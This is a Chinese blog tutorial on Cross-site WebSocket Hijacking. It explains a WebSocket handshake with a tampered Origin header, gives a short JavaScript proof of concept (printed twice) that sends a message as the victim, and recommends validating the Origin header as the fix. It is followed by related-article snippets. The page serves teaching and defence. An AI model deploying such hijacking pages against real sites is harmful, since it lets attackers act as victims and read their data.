websocket 跨域_浅谈WebSocket跨域劫持漏洞(CSWSH)

最新推荐文章于 2024-03-04 11:49:02 发布
最新推荐文章于 2024-03-04 11:49:02 发布
阅读量901 收藏
点赞数
文章标签: websocket 跨域
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_30800151/article/details/113324170
版权

WebSocket 跨域劫持漏洞

WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。

了解WebSocket

Websocket 优点

  1. 支持双向通信,实时性更强。
  2. 更好的二进制支持。
  3. 较少的控制开销。连接创建后,ws客户端、服务端进行数据交换时,协议控制的数据包头部较小。在不包含头部的情况下,服务端到客户端的包头只有2~10字节(取决于数据包长度),客户端到服务端的话,需要加上额外4字节的掩码。而HTTP协议每次通信都需要携带完整的头部。
  4. 支持扩展。ws协议定义了扩展,用户可以扩展协议,或者实现自定义的子协议。(比如支持自定义压缩算法等)

Websocket 如何建立连接

画了一张图让你了解:

be1d51e8e92cffea77da2620a13c68aa.png

漏洞产生

建立Websocket连接无验证。

案例

1.如下请求:

GET / HTTP/1.1
Host: localhost:8080
Origin: http://127.0.0.1:3000
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: w4v7O6xFTi36lq3RNcgctw==
​

篡改Origin,发现没有对Origin进行验证,也可以跨域进行协议升级。

2.进一步验证

2.1获取到了一个发送评论的请求 (使用BurpSuite->Proxy模块->Websockets History查看,这里是对应的 Direction值为Outgoing为发出的请求,Incoming为发出请求对应的响应信息

545b28136f0a2d712476a6e155adc904.png

2.2使用JavaScript创建Websocket请求

如上图所示Outgoing的内容为“我是帅key的可爱小迷弟”,那么发送的数据就是这个

<meta charset="utf-8">
<script>
function ws_attack(){
    var ws = new WebSocket("ws://域名:端口/");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss://
    ws.onopen = function(evt) { 
        ws.send("我是帅key的可爱小迷弟!");//发送的数据
    };
    ws.onmessage = function(evt) {
        ws.close();
    };
}
ws_attack();
</script>

2.3验证发现可以请求并成功进行重放,存在Websocket跨域劫持

(这里只是简单的评论请求,危害就是:点我链接让你评论我想评论的,试想:如果是修改密码的WebSocket请求存在劫持那么问题就大了~)

漏洞利用

攻击流程跟以往的交互类漏洞没什么区别(点我链接读取你XXX、点我链接让你XXX):

66fb15de14eca4a993392cbd2c9ee486.png

来一个圈子"铸剑实战靶场"直播平台存在漏洞测试截图,自我体会:

da38dfb405e99383541d0aef581e25a4.png

PoC代码编写

<meta charset="utf-8">
<script>
function ws_attack(){//自定义函数ws_attack
    //定义函数功能
    //创建WebSocket并赋值给ws变量
    var ws = new WebSocket("ws://域名:端口/");//如果请求的Websocket服务仅支持HTTP就写成ws://,如果请求的Websocket服务支持HTTPs就写成wss://
    ws.onopen = function(evt) { 
        //当ws(WebSocket)处于连接状态时执行
        ws.send("我是帅key的可爱小迷弟!");
    };
    ws.onmessage = function(evt) {
        //当ws(WebSocket)请求有响应信息时执行
        //注意:响应的信息可以通过evt.data获取!例如:alert(evt.data);
        ws.close();
    };
}
ws_attack();//执行ws_attact函数
</script>

修复方法

综合建议:校验Origin头

Reference

WebSocket协议:5分钟从入门到精通 - 程序猿小卡 - 博客园​www.cnblogs.com

欢迎各位关注微信公众号“米斯特安全团队”

36104ce52258049f99ce7e07dfd7a218.png
无机盐Alkali
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sockJs实现的websocket跨域
12-17
解决sockJs实现的websocket跨域问题,后台使用的springboot框架,maven
vue-socket.io跨域问题有效解决方法
10-15
在本篇文章里小编给大家整理的是关于vue-socket.io跨域问题有效解决方法,对此有兴趣的朋友们可以参考下。
websocket协议开源
05-27
WebSocket API是下一代客户端-服务器的异步通信方法。该通信取代了单个的TCP套接字,使用ws或wss协议,可用于任意的客户端和服务器程序。WebSocket目前由W3C进行标准化。WebSocket已经受到Firefox 4、Chrome 4、Opera 10.70以及Safari 5等浏览器的支持。WebSocket API最伟大之处在于服务器和客户端可以在给定的时间范围内的任意时刻,相互推送信息。WebSocket并不限于以Ajax(或XHR)方式通信,因为Ajax技术需要客户端发起请求,而WebSocket服务器和客户端可以彼此相互推送信息;XHR受到域的限制,而WebSocket允许跨域通信。Ajax技术很聪明的一点是没有设计要使用的方式。WebSocket为指定目标创建,用于双向推送消息。其实我一直想不明白HTML5包装个应用层办议作为Socket通过基础目的是为了什么,其实直接支持Socket tcp相对来说更加简单灵活.既然标准已经制定而浏览器也支持那对于我们开发者来说只能用的分.最新版本的WebSocket协议于2011-12其标准规范已经明确下来,所以现在
前端websocket劫持漏洞(CSWSH)
god_Zeo的安全博客
01-28 2187
其实简单的将,这个很类与websocket版本的CSRF,同样的需要没有CSRF的token,然后利用这一点,发送一下敏感的请求,做一些敏感操作。
跨域:利用JSONP、WebSocket实现跨域访问
qq_68163788的博客
11-12 2754
WebSocket和JSONP都可以用于跨域访问,但它们的实现方式和应用场景不同。 WebSocket是一种基于TCP协议的全双工通信协议,可以在浏览器和服务器之间建立一个持久性的连接,实现实时数据传输。WebSocket协议默认使用80端口(HTTP协议的默认端口)或443端口(HTTPS协议的默认端口),可以避免跨域问题。因此,使用WebSocket可以轻松实现跨域通信。 JSONP是一种通过动态创建script标签,利用浏览器对script标签跨域访问的特性,实现跨域数据传输的技术。
WebSocket概述极其漏洞解析
Zeker62的博客
08-24 745
目录什么是WebsocketWebsocket和HTTP区别Websocket如何建立WebSocket消息是怎样的?WebSocket安全漏洞操作WebSocket消息利用漏洞操纵 WebSocket 握手利用漏洞使用跨站 WebSockets 来利用漏洞如何保护 WebSocket 连接什么是WebsocketWebsocket是一种通信协议 通过HTTP发起的,全双工 用于现代We...
CSWSH漏洞总结
Restart的博客
01-16 490
转载自https://www.mi1k7ea.com/2019/10/04/CSWSH%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/#0x02-CSWSH%E6%BC%8F%E6%B4%9E 0x01 WebSocket 基本概念 一般的,Web应用的交互过程通常是客户端通过浏览器发出一个请求,服务器端接收请求后进行处理并返回结果给客户端,客户端浏览器将信息呈现。这种机制对于信息变化不是特别频繁的应用尚可,但却不适用于高并发与用户实时响应的场景,比如股票的实时信息、地图导航等。
解决跨域问题
weixin_51109349的博客
07-01 2370
2.CORS 服务器设置允许跨域 可以发送get ,post 3.XHR2 区别: 代理实现最麻烦,但使用最广泛,任何支持AJAX的浏览器都可以使用这种方式 JSONP相对简单,但只支持GET方式调用 XHR2最简单,但只支持HTML5,如果你是移动端开发,可以选择使用XHR2基于 webpack 的,通过 webpack-dev-server 相当于 node 模拟一个nginx 服务器请求服务器不存在跨域 6.nginx反向代理,由后端来做 7.window.postMessage() 方法可以安全地
WebSocket
weixin_43073401的博客
07-30 1013
需要注意的是,WebSocket是一种双向通信协议,能够实现全双工通信,而轮询、长轮询、SSE和Comet等兜底方案都是基于HTTP协议的单向通信方式,无法实现全双工通信。总结:WebSocket连接的建立过程是通过WebSocket对象的构造函数发起连接请求,服务器接受连接请求后进行握手,握手成功后建立双向通信通道,保持连接状态,实现实时双向通信的功能。显示断开提示:在WebSocket连接断开时,可以在界面上显示断开连接的提示信息,让用户知晓连接状态,并提供相应的操作,如重新连接按钮等。
挖洞经验 | 利用跨站WebSocket劫持CSWH)实现账户劫持
yggcwhat
01-16 646
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 本文分享的是作者在某次漏洞测试中,由于目标应用使用了WebSocket协议,经测试后,存在跨站WebSocket劫持漏洞。之后,作者利用该漏洞结合用户密码重置功能,实现了对目标应用注册账户的账户劫持攻击。 WebSocket技术和跨站WebSocket劫持攻击导读 为了更好地理解WebSocket 技术,在此,我们参考了IBM Developer社区《深入理解跨站点 WebSock
详解WebSocket跨域问题解决
01-19
我们使用Socket.io,它很好地封装了webSocket接口,提供了更简单、灵活的接口,也对不支持webSocket的浏览器提供了向下兼容。 项目中遇到javascript跨域问题,父页面和子页面要通信,并且父子页面跨域,怎么办? ...
微信小程序使用websocket防止 XSS 和 CSRF攻击
weixin_38120360的博客
03-24 758
2. 在服务器端,需要验证请求中的 CSRF Token 是否正确,避免恶意请求被执行。可以在每次请求时,从请求头中获取 CSRF Token,并与服务器端保存的 Token 进行比较。1. 在发送请求时,需要添加 CSRF Token,避免恶意请求被执行。可以在登录时生成一个 CSRF Token,并在每次请求时将其添加到请求头中。// 在服务器端,验证请求中的 CSRF Token 是否正确。// 在发送请求时,添加 CSRF Token 到请求头中。// CSRF Token 不正确,拒绝请求。
什么是同源策略?如何检测跨站点 WebSocket 劫持漏洞?post 表单跳转跨域问题、Ajax跨域请求、浏览器特性和安全策略、WebSocket 协议连接
最新发布
代码讲故事
03-04 531
什么是同源策略?如何检测跨站点 WebSocket 劫持漏洞?post 表单跳转跨域问题、Ajax跨域请求、浏览器特性和安全策略、WebSocket 协议连接。
websocket host 请求头 怎么填写_浅谈WebSocket跨域劫持漏洞(CSWSH)
weixin_39522486的博客
12-12 623
WebSocket 跨域劫持漏洞WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。了解WebSocketWebsocket 优点支持双向通信,实时性更强。更好的二进制支持。较少的控制开销。连接创建后,ws客户端、服务端进行数据交换时,协议控制的数据包头部较小。在不包含头部的情况下,服务端到客户端的包头只有...
WebSocket通信协议应用安全问题分析
weixin_33975951的博客
08-01 1499
WebSocket是HTML5开始提供的一种浏览器与服务器间进行全双工通讯的网络技术。WebSocket通信协议于2011年被IETF定为标准RFC 6455,WebSocket API也被W3C定为标准,主流的浏览器都已经支持WebSocket通信。 WebSocket协议是基于TCP协议上的独立的通信协议,在建立WebSocket通信连接前,需要使...
实战分析和精华总结:CORS跨域资源共享漏洞数据劫持、复现、分析、利用及修复过程
代码讲故事
12-03 1331
实战分析和精华总结:CORS跨域资源共享漏洞数据劫持、复现、分析、利用及修复过程。 CORS跨域资源共享漏洞与JSONP劫持漏洞类似,都是程序员在解决跨域问题中进行了错误的配置。攻击者可以利用Web应用对用户请求数据包的Origin头校验不严格,诱骗受害者访问攻击者制作好的恶意网站,从而跨域获取受害者的敏感数据,包括转账记录、交易记录、个人身份证号信息、订单信息等等。
WebSocket安全漏洞
Eason_LYC安全白帽子的成长博客
05-14 2471
websocket安全,网上讨论的不多,不是非安全方向,就是太晦涩就。本文正好适合初学者在熟悉websocket基础知识的同时,学习其安全技术,并有靶场进行练习,是绝佳的上手websocket安全漏洞挖掘的文章
跨域使用websocket_浅谈 WebSocket 跨域劫持漏洞(CSWSH)
weixin_35391232的博客
01-15 220
原文首发在圈子社区:https://secquan.org/Discuss/1069086WebSocket 跨域劫持漏洞WebSocket 跨域劫持漏洞,英文名:Cross-site WebSocket Hijacking,漏洞类型:全能型CSRF(可读、可写)。了解WebSocketWebsocket 优点支持双向通信,实时性更强。更好的二进制支持。较少的控制开销。连接创建后,ws客...
WebSocket解决跨域问题
热门推荐
AnitaSun的博客
06-16 1万+
这种方式本质没有使用HTTP响应头,因此也没有跨域的限制 前端部分:<script> let socket = new WebSocket("ws://localhost:8080"); socket.onopen = function() { socket.send("秋风的笔记"); }; socket.onmessage = function(e) { console.log(e.data); }; </script> 后端部分:con.
websocket跨域
09-09
Websocket跨域问题与常规的 HTTP 请求的跨域问题有些不同。在 Websocket 中,浏览器会预先发送一个特殊的 HTTP 请求来建立 Websocket 连接,这个过程称为 "握手"。因此,跨域问题主要出现在握手阶段。 为了解决 Websocket 跨域问题,通常有以下几种方法: 1. CORS(跨域资源共享):如果你有控制 Websocket 服务器端代码的权限,可以在服务器端设置 CORS 头部,允许来自特定域名的 Websocket 连接。在响应握手请求时,设置 `Access-Control-Allow-Origin` 头部为允许的域名。 2. 反向代理:如果没有权限修改服务器端代码,可以考虑使用反向代理来绕过跨域限制。将 Websocket 请求转发到与服务器端同源的地址,然后由反向代理服务器与实际的 Websocket 服务器进行通信。 3. JSONP:虽然 Websocket 不支持 JSONP,但如果服务器端支持 JSONP,可以使用 JSONP 来模拟 Websocket 的行为。通过在页面中动态创建 `<script>` 标签,并将 JSONP 请求发送到支持跨域访问的服务器上,从而实现类似 Websocket 的功能。 需要注意的是,使用以上方法解决跨域问题可能会引入一些安全风险,请确保在实施跨域解决方案时仔细考虑安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值